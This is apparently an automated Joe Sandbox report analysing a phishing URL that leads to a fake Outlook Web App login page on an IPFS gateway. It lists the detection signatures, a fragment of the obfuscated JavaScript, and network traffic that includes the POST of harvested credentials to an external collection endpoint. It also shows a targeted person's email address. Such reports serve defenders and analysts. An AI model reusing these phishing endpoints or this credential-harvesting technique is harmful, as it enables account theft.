Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
https://universidad-unidem.edu.mx/mah/i/amFjb2JAc3RlaW5ib3JuLmNvbQ==

Overview

General Information

Sample URL:https://universidad-unidem.edu.mx/mah/i/amFjb2JAc3RlaW5ib3JuLmNvbQ==
Analysis ID:1585507
Infos:

Detection

HTMLPhisher
Score:92
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

AI detected phishing page
Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Yara detected HtmlPhish10
Yara detected Phisher
AI detected suspicious Javascript
HTML page contains obfuscated javascript
Performs DNS queries to domains with low reputation
HTML body contains low number of good links
HTML body contains password input but no form action
HTML title does not match URL
Stores files to the Windows start menu directory

Classification

  • System is w10x64_ra
  • chrome.exe (PID: 6272 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • chrome.exe (PID: 6900 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2004,i,9343348365706699268,11079859992953663634,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • chrome.exe (PID: 6608 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://universidad-unidem.edu.mx/mah/i/amFjb2JAc3RlaW5ib3JuLmNvbQ==" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
dropped/chromecache_70JoeSecurity_Phisher_2Yara detected PhisherJoe Security
    SourceRuleDescriptionAuthorStrings
    1.1.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
      1.2.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
        1.0.pages.csvJoeSecurity_HtmlPhish_10Yara detected HtmlPhish_10Joe Security
          No Sigma rule has matched
          No Suricata rule has matched

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: https://universidad-unidem.edu.mx/mah/i/amFjb2JAc3RlaW5ib3JuLmNvbQ==SlashNext: detection malicious, Label: Credential Stealing type: Phishing & Social Engineering
          Source: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/Avira URL Cloud: Label: malware
          Source: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/owa/auth/15.0.1497/themes/resources/segoeui-semilight.ttfAvira URL Cloud: Label: malware
          Source: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz#jacobAvira URL Cloud: Label: malware

          Phishing

          barindex
          Source: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/#jacob@steinborn.comJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft Outlook' is well-known and typically associated with the domain 'outlook.com'., The provided URL 'bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz' does not match the legitimate domain for Microsoft Outlook., The URL contains unusual elements such as 'ipfs' and 'flk-ipfs.xyz', which are not associated with Microsoft Outlook., The presence of 'ipfs' suggests the use of a decentralized file storage system, which is not typical for Microsoft Outlook services., The URL structure and domain extension are suspicious and do not align with the well-known brand's typical domain usage. DOM: 1.0.pages.csv
          Source: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/#jacob@steinborn.comJoe Sandbox AI: Score: 9 Reasons: The brand 'Microsoft Outlook' is well-known and typically associated with the domain 'outlook.com'., The provided URL 'bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz' does not match the legitimate domain for Microsoft Outlook., The URL contains a long, nonsensical string and uses 'ipfs.flk-ipfs.xyz', which is not associated with Microsoft Outlook., The use of 'ipfs' and a non-standard domain extension is suspicious and indicative of a potential phishing attempt., The presence of input fields for 'Email Address' and 'Password' is common in phishing sites attempting to harvest credentials. DOM: 1.1.pages.csv
          Source: Yara matchFile source: 1.1.pages.csv, type: HTML
          Source: Yara matchFile source: 1.2.pages.csv, type: HTML
          Source: Yara matchFile source: 1.0.pages.csv, type: HTML
          Source: Yara matchFile source: dropped/chromecache_70, type: DROPPED
          Source: 0.0.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://universidad-unidem.edu.mx/mah/i/amFjb2JAc3... The script redirects the user to a suspicious IPFS domain, which is a potential indicator of malicious activity. The obfuscated URL and the inclusion of an email address in the hash fragment suggest that this script may be part of a phishing or credential harvesting attempt.
          Source: 0.1.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2... This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and obfuscated code/URLs. The use of `eval`, `Function` constructor, and sending sensitive data to external servers are clear indicators of malicious intent. Additionally, the heavy obfuscation of the code and URLs further increases the risk. While the script's purpose is not entirely clear, the combination of these factors suggests a high likelihood of malicious activity, warranting a high-risk score.
          Source: 0.8.id.script.csvJoe Sandbox AI: Detected suspicious JavaScript with source url: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2... This script exhibits several high-risk behaviors that indicate potential malicious intent. It collects sensitive user data (email and password) and sends it to an untrusted external domain ('https://xsapz.com/ar/main.php'). Additionally, it redirects the user to another suspicious domain ('https://sedutti.com/OldSite/images/w.php') after a short delay, which is a common tactic used in phishing and other malicious activities. The script also uses obfuscation techniques, making it difficult to analyze the true purpose of the code. Overall, the combination of data exfiltration, suspicious redirects, and obfuscation suggests a high-risk scenario that should be investigated further.
          Source: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/#jacob@steinborn.comHTTP Parser: <!--var _0x417f08=_0x3e80;(function(_0x12a42d,_0x102eb4){var _0x239bae=_0x3e80,_0x4b90d1=_0x12a42d
          Source: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/#jacob@steinborn.comHTTP Parser: Number of links: 0
          Source: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/#jacob@steinborn.comHTTP Parser: <input type="password" .../> found but no <form action="...
          Source: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/#jacob@steinborn.comHTTP Parser: Title: Outlook Web App does not match URL
          Source: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/#jacob@steinborn.comHTTP Parser: <input type="password" .../> found
          Source: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/#jacob@steinborn.comHTTP Parser: No <meta name="author".. found
          Source: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/#jacob@steinborn.comHTTP Parser: No <meta name="author".. found
          Source: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/#jacob@steinborn.comHTTP Parser: No <meta name="author".. found
          Source: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/#jacob@steinborn.comHTTP Parser: No <meta name="copyright".. found
          Source: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/#jacob@steinborn.comHTTP Parser: No <meta name="copyright".. found
          Source: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/#jacob@steinborn.comHTTP Parser: No <meta name="copyright".. found

          Networking

          barindex
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeDNS query: bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 20.189.173.10
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.211.108
          Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.34
          Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.34
          Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.34
          Source: unknownTCP traffic detected without corresponding DNS query: 217.20.57.34
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.74
          Source: unknownTCP traffic detected without corresponding DNS query: 192.229.221.95
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.74
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.74
          Source: unknownTCP traffic detected without corresponding DNS query: 40.126.32.74
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficHTTP traffic detected: GET /mah/i/amFjb2JAc3RlaW5ib3JuLmNvbQ== HTTP/1.1Host: universidad-unidem.edu.mxConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: documentReferer: https://universidad-unidem.edu.mx/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /5rThDVw/outlook.png HTTP/1.1Host: i.ibb.coConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /new/arsm/media/download-logo.png HTTP/1.1Host: wafsd.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /new/arsm/media/download.gif HTTP/1.1Host: wafsd.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /5rThDVw/outlook.png HTTP/1.1Host: i.ibb.coConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /new/arsm/media/download-logo.png HTTP/1.1Host: wafsd.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /new/arsm/media/download.gif HTTP/1.1Host: wafsd.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /new/arsm/media/favicon.ico HTTP/1.1Host: wafsd.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /new/arsm/media/favicon.ico HTTP/1.1Host: wafsd.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /owa/auth/15.0.1497/themes/resources/segoeui-semilight.ttf HTTP/1.1Host: bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyzConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyzsec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: GET /ar/main.php HTTP/1.1Host: xsapz.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficDNS traffic detected: DNS query: universidad-unidem.edu.mx
          Source: global trafficDNS traffic detected: DNS query: bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz
          Source: global trafficDNS traffic detected: DNS query: i.ibb.co
          Source: global trafficDNS traffic detected: DNS query: wafsd.com
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: xsapz.com
          Source: unknownHTTP traffic detected: POST /ar/main.php HTTP/1.1Host: xsapz.comConnection: keep-aliveContent-Length: 95sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/json; charset=utf-8Accept: */*Origin: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyzSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 07 Jan 2025 17:47:12 GMTContent-Type: text/plain; charset=utf-8Content-Length: 229Connection: closeAccess-Control-Allow-Headers: Content-TypeAccess-Control-Allow-Headers: RangeAccess-Control-Allow-Headers: User-AgentAccess-Control-Allow-Headers: X-Requested-WithAccess-Control-Allow-Methods: GETAccess-Control-Allow-Methods: HEADAccess-Control-Allow-Methods: OPTIONSAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-LengthAccess-Control-Expose-Headers: Content-RangeAccess-Control-Expose-Headers: X-Chunked-OutputAccess-Control-Expose-Headers: X-Ipfs-PathAccess-Control-Expose-Headers: X-Ipfs-RootsAccess-Control-Expose-Headers: X-Stream-OutputX-Content-Type-Options: nosniffX-Ipfs-Path: /ipfs/bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu/owa/auth/15.0.1497/themes/resources/segoeui-semilight.ttfStrict-Transport-Security: max-age=31536000; includeSubDomainsX-Ipfs-Pop: gateway-fra1
          Source: chromecache_70.1.drString found in binary or memory: https://bafkreiej3i4txy4a5q6un44hfauu5dfxfscoda5e2m7rsviyxfflphvqgu.ipfs.flk-ipfs.xyz#jacob
          Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49700
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49720
          Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49729 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
          Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49733
          Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
          Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 49700 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49729
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49726
          Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
          Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49723
          Source: classification engineClassification label: mal92.phis.troj.win@18/26@18/9
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2004,i,9343348365706699268,11079859992953663634,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
          Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://universidad-unidem.edu.mx/mah/i/amFjb2JAc3RlaW5ib3JuLmNvbQ=="
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2004,i,9343348365706699268,11079859992953663634,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
          Source: Google Drive.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: YouTube.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Sheets.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Gmail.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Slides.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Docs.lnk.0.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
          Source: Window RecorderWindow detected: More than 3 window changes detected
